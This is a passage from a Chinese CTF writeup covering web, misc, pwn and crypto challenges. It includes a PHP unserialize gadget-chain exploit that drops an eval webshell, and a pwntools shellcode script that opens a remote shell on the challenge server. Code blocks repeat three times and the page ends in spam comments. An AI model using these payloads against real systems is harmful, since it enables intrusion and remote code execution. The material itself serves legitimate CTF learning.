class wo {
    public $sex;
    public $age;
    public $intention;
    public function __destruct(){
        echo "Hi Try serialize Me!";
        $this->inspect();
    }
    function inspect(){
        if($this->sex=='boy'&&$this->age=='eighteen') {
            echo $this->intention;
        }
        echo "🙅18岁🈲";
    }
}
class Demo {
    public $a;
    static function __callStatic($action, $do) {
        global $b;
        $b($do[0]); }
}
$b = $_POST['password']; 
$a = $_POST['username']; 
@unserialize($a); 
if (!isset($b)) { 
    echo "==================PLZ Input Your Name!=================="; } 
    if($a=='admin'&&$b=="'k1fuhu's test demo") {
         echo("登录成功"); 
        } ?>

反序列化构造，利用点是Demo类里的$b($do[0];)动态函数调用

构造方法就是利用wo类的的 echo $this->intention触发shi类里的**__tostring ** 然后**_tostring ** 的静态类调用触发demo类中的**__callStatic

exp


$shi=new shi();
$wo=new wo();
$demo=new demo();
$shi->pass="echo '<?php eval(\$_POST[1]);?>' > 3.php ";
$shi->next=$demo;
$wo->age='eighteen';$wo->sex='boy';$wo->intention=$shi;
echo serialize($wo);
$shi=new shi();
$wo=new wo();
$demo=new demo();
$shi->pass="echo '<?php eval(\$_POST[1]);?>' > 3.php ";
$shi->next=$demo;
$wo->age='eighteen';$wo->sex='boy';$wo->intention=$shi;
echo serialize($wo);
$shi=new shi();
$wo=new wo();
$demo=new demo();
$shi->pass="echo '<?php eval(\$_POST[1]);?>' > 3.php ";
$shi->next=$demo;
$wo->age='eighteen';$wo->sex='boy';$wo->intention=$shi;
echo serialize($wo);

post传参username传序列化后的结果，password传system字符串

图片[19],青少年CTF擂台挑战赛 2024 #Round 1 Writeup,网络安全爱好者中心-神域博客网

然后到3.php就可以rce拿到flag了

图片[20],青少年CTF擂台挑战赛 2024 #Round 1 Writeup,网络安全爱好者中心-神域博客网

->Misc方向

CTFer_Revenge

图片[21],青少年CTF擂台挑战赛 2024 #Round 1 Writeup,网络安全爱好者中心-神域博客网

打开附件是个txt

图片[22],青少年CTF擂台挑战赛 2024 #Round 1 Writeup,网络安全爱好者中心-神域博客网

这应该是一个文件的16进制格式，不过反了过来，利用在线网站反转回来

图片[23],青少年CTF擂台挑战赛 2024 #Round 1 Writeup,网络安全爱好者中心-神域博客网

然后写python脚本把其中的16进制数据提取出来


# 打开输入文件和输出文件
input_file = '1.txt'
output_file = '3.txt'
# 打开输入文件进行读取
with open(input_file, 'r') as f:
    # 读取每一行并去除前8个字符，然后写入输出文件
    with open(output_file, 'w') as out_f:
        for line in f:
            out_f.write(line[10:49].upper()+'\n')  # 写入去除了前8个字符的行
print("处理完成，输出文件为:", output_file)
# 打开输入文件和输出文件
input_file = '1.txt'
output_file = '3.txt'

# 打开输入文件进行读取
with open(input_file, 'r') as f:
    # 读取每一行并去除前8个字符，然后写入输出文件
    with open(output_file, 'w') as out_f:
        for line in f:
            out_f.write(line[10:49].upper()+'\n')  # 写入去除了前8个字符的行

print("处理完成，输出文件为:", output_file)
# 打开输入文件和输出文件
input_file = '1.txt'
output_file = '3.txt'

# 打开输入文件进行读取
with open(input_file, 'r') as f:
    # 读取每一行并去除前8个字符，然后写入输出文件
    with open(output_file, 'w') as out_f:
        for line in f:
            out_f.write(line[10:49].upper()+'\n')  # 写入去除了前8个字符的行

print("处理完成，输出文件为:", output_file)

然后用010创建新建二进制文件，看其文件头应该是zip格式把后缀名改为zip打开

图片[24],青少年CTF擂台挑战赛 2024 #Round 1 Writeup,网络安全爱好者中心-神域博客网

其中flag是加密的图片，然后第二个提示是小写字母加数字，爆破压缩包的到密码为z12345

图片[25],青少年CTF擂台挑战赛 2024 #Round 1 Writeup,网络安全爱好者中心-神域博客网

flag:qsnctf{b414e3e3a6449ddba0997db259203eb7}

小光的答案之书

图片[26],青少年CTF擂台挑战赛 2024 #Round 1 Writeup,网络安全爱好者中心-神域博客网

图片[27],青少年CTF擂台挑战赛 2024 #Round 1 Writeup,网络安全爱好者中心-神域博客网

图片[28],青少年CTF擂台挑战赛 2024 #Round 1 Writeup,网络安全爱好者中心-神域博客网

跳转后需要密码

图片[29],青少年CTF擂台挑战赛 2024 #Round 1 Writeup,网络安全爱好者中心-神域博客网

对照随波逐流编码表

图片[30],青少年CTF擂台挑战赛 2024 #Round 1 Writeup,网络安全爱好者中心-神域博客网

圣武士密码->密码life

图片[31],青少年CTF擂台挑战赛 2024 #Round 1 Writeup,网络安全爱好者中心-神域博客网

->Pwn方向

简单的数学题

图片[32],青少年CTF擂台挑战赛 2024 #Round 1 Writeup,网络安全爱好者中心-神域博客网

图片[33],青少年CTF擂台挑战赛 2024 #Round 1 Writeup,网络安全爱好者中心-神域博客网

这题就是解除三个方程即可

前两个都很简单，第三个需要用到python

图片[34],青少年CTF擂台挑战赛 2024 #Round 1 Writeup,网络安全爱好者中心-神域博客网

脚本如下:


from sympy import symbols, Eq, solve
# 定义符号变量 x
x = symbols('x')
# 定义方程
equation = Eq(x**10 + 2**10 - 4*x, 6131066258749)
# 解方程
solution = solve(equation, x)
# 打印结果
print("x 的解为:", solution)
from sympy import symbols, Eq, solve

# 定义符号变量 x
x = symbols('x')

# 定义方程
equation = Eq(x**10 + 2**10 - 4*x, 6131066258749)

# 解方程
solution = solve(equation, x)

# 打印结果
print("x 的解为:", solution)
from sympy import symbols, Eq, solve

# 定义符号变量 x
x = symbols('x')

# 定义方程
equation = Eq(x**10 + 2**10 - 4*x, 6131066258749)

# 解方程
solution = solve(equation, x)

# 打印结果
print("x 的解为:", solution)

Easy_Shellcode

简单的shellcode，不过s的地址是变化的，但是题目给出了，使用pwntools接受即可

图片[35],青少年CTF擂台挑战赛 2024 #Round 1 Writeup,网络安全爱好者中心-神域博客网

图片[36],青少年CTF擂台挑战赛 2024 #Round 1 Writeup,网络安全爱好者中心-神域博客网

脚本如下：


from pwn import *
context(os="Linux",arch="amd64")
#io = process("./easy-shellcode")
io=remote("challenge.qsnctf.com",32436)
buff=io.recv(14)
#print(buff)
payload =asm(shellcraft.sh()).ljust(256,b'a') + p64(0) + p64(int(buff,16))
io.sendline(payload)
io.interactive()
from pwn import *
context(os="Linux",arch="amd64")
#io = process("./easy-shellcode")
io=remote("challenge.qsnctf.com",32436)
buff=io.recv(14)
#print(buff)

payload =asm(shellcraft.sh()).ljust(256,b'a') + p64(0) + p64(int(buff,16))
io.sendline(payload)
io.interactive()
from pwn import *
context(os="Linux",arch="amd64")
#io = process("./easy-shellcode")
io=remote("challenge.qsnctf.com",32436)
buff=io.recv(14)
#print(buff)

payload =asm(shellcraft.sh()).ljust(256,b'a') + p64(0) + p64(int(buff,16))
io.sendline(payload)
io.interactive()

图片[37],青少年CTF擂台挑战赛 2024 #Round 1 Writeup,网络安全爱好者中心-神域博客网

->Crypto方向

解个方程

图片[38],青少年CTF擂台挑战赛 2024 #Round 1 Writeup,网络安全爱好者中心-神域博客网

简单的密码加密常识

求逆元的方程为:d=libnum.invmod(e,phi)

m=pow(c,d,n)

四重加密

图片[39],青少年CTF擂台挑战赛 2024 #Round 1 Writeup,网络安全爱好者中心-神域博客网

图片[40],青少年CTF擂台挑战赛 2024 #Round 1 Writeup,网络安全爱好者中心-神域博客网

base32解码后得到:

图片[41],青少年CTF擂台挑战赛 2024 #Round 1 Writeup,网络安全爱好者中心-神域博客网

这个就是压缩文件的密码

图片[42],青少年CTF擂台挑战赛 2024 #Round 1 Writeup,网络安全爱好者中心-神域博客网

unicode编码

图片[43],青少年CTF擂台挑战赛 2024 #Round 1 Writeup,网络安全爱好者中心-神域博客网

维吉尼亚

图片[44],青少年CTF擂台挑战赛 2024 #Round 1 Writeup,网络安全爱好者中心-神域博客网

rot13

图片[45],青少年CTF擂台挑战赛 2024 #Round 1 Writeup,网络安全爱好者中心-神域博客网

flag内内容套到qsnctf提交

------本文已结束，感谢您的阅读------

THE END

评论共15条

请登录后发表评论

登录注册

只看作者

- Ivy Mante0
  you are in reality a good webmaster The website loading velocity is amazing It sort of feels that youre doing any distinctive trick Also The contents are masterwork you have done a fantastic job in this topic
  10个月前回复
- Shakira Oberbrunner0
  I've been following your blog for quite some time now, and I'm continually impressed by the quality of your content. Your ability to blend information with entertainment is truly commendable.
  10个月前回复
- Lawrence Smith0
  helloI really like your writing so a lot share we keep up a correspondence extra approximately your post on AOL I need an expert in this house to unravel my problem May be that is you Taking a look ahead to see you
  10个月前回复
- Nakia Considine0
  Your writing is a true testament to your expertise and dedication to your craft. I'm continually impressed by the depth of your knowledge and the clarity of your explanations. Keep up the phenomenal work!
  10个月前回复
- Fleta Windler0
  I have read some excellent stuff here Definitely value bookmarking for revisiting I wonder how much effort you put to make the sort of excellent informative website
  10个月前回复
- Jean Bashirian0
  Your ability to distill complex concepts into digestible nuggets of wisdom is truly remarkable. I always come away from your blog feeling enlightened and inspired. Keep up the phenomenal work!
  10个月前回复
- Thurman Morar0
  Your blog is a testament to your dedication to your craft. Your commitment to excellence is evident in every aspect of your writing. Thank you for being such a positive influence in the online community.
  10个月前回复
- Philip Farrell0
  Your blog is a testament to your passion for your subject matter. Your enthusiasm is infectious, and it's clear that you put your heart and soul into every post. Keep up the fantastic work!
  10个月前回复
- Amos Hauck0
  Hello Neat post Theres an issue together with your site in internet explorer would check this IE still is the marketplace chief and a large element of other folks will leave out your magnificent writing due to this problem
  10个月前回复
- Felton Ruecker0
  Your blog is like a beacon of light in the vast expanse of the internet. Your thoughtful analysis and insightful commentary never fail to leave a lasting impression. Thank you for all that you do.
  10个月前回复
- Kacie Runte0
  I do trust all the ideas youve presented in your post They are really convincing and will definitely work Nonetheless the posts are too short for newbies May just you please lengthen them a bit from next time Thank you for the post
  10个月前回复
- Alverta Gutmann0
  helloI like your writing very so much proportion we keep up a correspondence extra approximately your post on AOL I need an expert in this space to unravel my problem May be that is you Taking a look forward to see you
  10个月前回复
- Kay Torphy0
  I do not even know how I ended up here but I thought this post was great I do not know who you are but certainly youre going to a famous blogger if you are not already Cheers
  10个月前回复
- Aaron Goldner0
  This story was deeply moving, thank you for sharing.
  11个月前回复
- Meaghan Trantow0
  you are in reality a just right webmaster The site loading velocity is incredible It seems that you are doing any unique trick In addition The contents are masterwork you have performed a wonderful task on this topic
  11个月前回复